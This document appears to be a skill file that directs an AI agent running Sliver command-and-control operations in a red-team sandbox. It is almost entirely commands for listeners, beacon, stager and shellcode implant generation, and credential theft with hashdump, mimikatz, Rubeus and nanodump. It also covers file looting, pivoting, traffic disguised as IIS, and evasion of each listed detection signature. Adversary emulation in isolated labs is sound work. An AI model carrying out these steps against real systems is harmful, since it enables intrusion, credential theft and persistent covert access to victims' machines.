| name | c2-sliver |
| description | Sliver C2 framework operations — server connection, listener setup, implant generation, BOF/Armory extensions, post-implant operations, HTTP C2 profiles. |
| allowed-tools | Bash Read |
| metadata | {"subdomain":"command-and-control","when_to_use":"Sliver, sliver-client, sliver listener, sliver implant, sliver beacon, armory, BOF","tags":"c2, sliver, implant, beacon, listener, bof, armory, pivot","mitre_attack":"T1071, T1573, T1090, T1105, T1572"} |
Sliver C2 Framework
Sliver is an open-source, cross-platform adversary emulation framework by BishopFox. It supports beacon (async) and session (interactive) implants over mTLS, HTTPS, DNS, and WireGuard channels with multi-operator support.
Decepticon Setup
Server: c2-sliver container on sandbox-net (daemon mode, gRPC on port 31337)
Client: sliver-client pre-installed in sandbox
Config: Auto-generated operator config at /workspace/.sliver-configs/decepticon.cfg
Connection Procedure (via bash tool)
# 1. Verify C2 reachable
bash(command="nc -z c2-sliver 31337 && echo 'C2_OK' || echo 'C2_DOWN'", description="Check the Sliver C2 server is reachable")
# 2. Import operator config (once — skip if already imported)
bash(command="ls ~/.sliver-client/configs/ 2>/dev/null | grep -q . || sliver-client import /workspace/.sliver-configs/decepticon.cfg", description="Import the Sliver operator config if not already present")
# 3. Start interactive console in dedicated tmux session
bash(command="sliver-client console", session="c2", description="Open the Sliver client console")
# 4. Run Sliver commands interactively
bash(command="https --lhost 0.0.0.0 --lport 443 --domain c2-sliver", is_input=True, session="c2", description="Start an HTTPS listener on port 443")
bash(command="sessions", is_input=True, session="c2", description="List active Sliver sessions")
IMPORTANT:
- Do NOT generate operator configs manually — use the pre-generated one at
/workspace/.sliver-configs/decepticon.cfg
- Do NOT start
sliver-server in sandbox — the server runs in its own container
sliver-client console is interactive — MUST use a dedicated session (e.g. session="c2") and send subsequent commands with is_input=True
- If "multiple configs found":
bash(command="sliver-client console --config ~/.sliver-client/configs/decepticon_c2-sliver.cfg", session="c2", description="Open the Sliver console with the explicit config")
1. Listener Configuration
All commands below run inside the Sliver console (session="c2", is_input=True).
HTTPS Listener
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver \
--cert /workspace/certs/cert.pem \
--key /workspace/certs/key.pem
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver --lets-encrypt
DNS Listener
dns --domains c2.<TARGET> --lport 53
dig @c2-sliver test.c2.<TARGET> TXT +short
mTLS Listener
mtls --lhost 0.0.0.0 --lport 8888
mtls --lhost 0.0.0.0 --lport 8443
WireGuard Listener
wg --lhost 0.0.0.0 --lport 51820
2. Implant Generation
CRITICAL — Compilation Timeout:
Sliver's generate command compiles a Go binary from source. This takes 2-10 minutes
depending on options. The spinner animation (⠴ Compiling, please wait ...) keeps the
screen active, so stall detection will NOT trigger early.
Rules:
- ALWAYS use
--skip-symbols — reduces compilation time from ~5 min to ~30 sec
- ALWAYS use
--save <path> — saves implant directly to the target directory.
Do NOT rely on the default save location and then cp — file copy may fail on
bind-mounted volumes (WSL2/NTFS "Invalid argument" error).
- Use a longer timeout for generate commands:
bash(command="generate ...", is_input=True, session="c2", timeout=300, description="Generate the Sliver implant")
Example (correct):
bash(command="generate --os linux --arch amd64 --mtls c2-sliver:8888 --skip-symbols --save /workspace/exploit/", is_input=True, session="c2", timeout=300, description="Generate a Linux mTLS implant into the exploit directory")
Beacon (Async)
generate beacon --mtls c2-sliver:8888 --os windows --arch amd64 \
--seconds 30 --jitter 50 --skip-symbols \
--name win_beacon \
--save /workspace/exploit/
generate beacon --https c2-sliver:443 --os windows --arch amd64 \
--seconds 60 --jitter 30 --skip-symbols \
--save /workspace/exploit/
generate beacon --dns c2-sliver --os linux --arch amd64 \
--seconds 120 --jitter 70 --skip-symbols \
--name lin_dns \
--save /workspace/exploit/
Session (Interactive)
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
--skip-symbols --name win_session \
--save /workspace/exploit/
generate --https c2-sliver:443 --os linux --arch amd64 \
--skip-symbols --name lin_https \
--save /workspace/exploit/
Stager (Small Initial Payload)
generate stager --lhost c2-sliver --lport 8443 --protocol tcp \
--os windows --arch amd64 \
--save /workspace/exploit/stager.bin
Shellcode (For Custom Loaders)
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
--format shellcode --skip-symbols \
--save /workspace/exploit/shellcode.bin
Output Formats
| Format | Flag | Use Case |
|---|
| EXE | --format exe | Direct execution |
| Shared library | --format shared | DLL sideloading |
| Shellcode | --format shellcode | Injection, custom loaders |
| Service | --format service | Windows service persistence |
OPSEC: Implant Hardening
generate --mtls c2-sliver:8888 --os windows --skip-symbols
generate --mtls c2-sliver:8888 --os windows --format shellcode --skip-symbols
3. Session & Beacon Management
sessions
beacons
use <SESSION_ID>
use <BEACON_ID>
background
sessions -k <SESSION_ID>
rename -n <NEW_NAME>
4. Post-Implant Operations
Host Reconnaissance
whoami
getuid
getgid
getprivs
info
shell systeminfo
shell ipconfig /all
shell net user
shell net localgroup administrators
shell tasklist /v
env
pwd
ls
File Operations
download C:\\Users\\<USER>\\Documents\\sensitive.docx /workspace/post-exploit/loot/
upload /workspace/exploit/implants/SharpHound.exe C:\\Windows\\Temp\\
ls C:\\Users\\<USER>\\Desktop\\
Process Operations
ps
migrate <PID>
execute-assembly /workspace/tools/Seatbelt.exe -group=all
sideload /workspace/tools/mimikatz.dll
screenshot
shell notepad.exe
Credential Operations
hashdump
execute-assembly /workspace/tools/Rubeus.exe dump
execute-assembly /workspace/tools/SharpDPAPI.exe triage
execute-assembly /workspace/tools/Seatbelt.exe -group=all
5. BOF / Armory (In-Memory Extensions)
Beacon Object Files (BOFs) execute position-independent C code in the implant process — no new process creation, no disk writes.
Armory (Package Manager)
armory
armory install sa-ldapsearch
armory install nanodump
armory install credman
armory install situational-awareness
armory update
BOF Execution
sa-ldapsearch -- "(objectClass=user)"
sa-ldapsearch -- "(objectClass=computer)"
nanodump -w C:\\Windows\\Temp\\debug.dmp
credman
situational-awareness
Why BOFs Over execute-assembly
| Feature | BOF | execute-assembly |
|---|
| Process creation | None (runs in implant) | Fork & run (new process) |
| Disk artifacts | None | .NET assembly loaded |
| EDR visibility | Low (in-process) | Medium (CLR load event) |
| Size | Small (KBs) | Larger (full .NET binary) |
| Flexibility | C only | Any .NET assembly |
6. Network & Pivot Operations
SOCKS5 Proxy
socks5 start -p 1080
Port Forwarding
portfwd add -b 127.0.0.1:9090 -r <INTERNAL_HOST>:445
portfwd
portfwd rm -i <ID>
Reverse Port Forwarding
rportfwd add -b <INTERNAL_HOST>:8080 -r 127.0.0.1:8080
Pivot Listener
pivots tcp --bind 0.0.0.0:9898
generate --tcp-pivot <PIVOT_HOST>:9898 --os windows
WireGuard Pivot
wg-portfwd add --remote <INTERNAL_HOST>:3389 --bind 127.0.0.1:3389
7. HTTP C2 Profile
Custom profiles shape C2 traffic to mimic legitimate application traffic.
{
"implant_config": {
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"url_parameters": [
{ "name": "session", "value": "{{.GUID}}", "probability": 100 }
],
"headers": [
{ "name": "Accept", "value": "text/html,application/xhtml+xml", "probability": 100 },
{ "name": "Accept-Language", "value": "en-US,en;q=0.9", "probability": 100 }
]
},
"server_config": {
"headers": [
{ "name": "Content-Type", "value": "text/html; charset=utf-8", "probability": 100 },
{ "name": "Server", "value": "Microsoft-IIS/10.0", "probability": 100 },
{ "name": "X-Powered-By", "value": "ASP.NET", "probability": 100 }
]
}
}
Save to profiles/sliver_https.json and apply when starting HTTPS listener.
8. Detection Signatures (Sliver-Specific)
| Indicator | Pattern | Mitigation |
|---|
| Default HTTP headers | Server: Apache/2.4.x + unique header combo | Use custom HTTP C2 profile |
| Default URI patterns | /login.php, /admin/login, /index.php | Custom URI paths |
| mTLS on non-standard ports | Outbound to unusual port (8888) | Use 443/8443 |
| DNS TXT encoding | Base64 TXT > 255 bytes | Fragment, short polling |
| Implant file hashes | Known Sliver samples in VirusTotal | --skip-symbols, custom loaders |
| JA3/JA3S fingerprints | TLS patterns unique to Sliver | Process injection into browser |
9. Validation Criteria
Bundled Resources
References
references/sliver-quickstart.md — Compact command reference for Sliver architecture, listeners, implant generation, post-implant ops, pivoting, and OPSEC.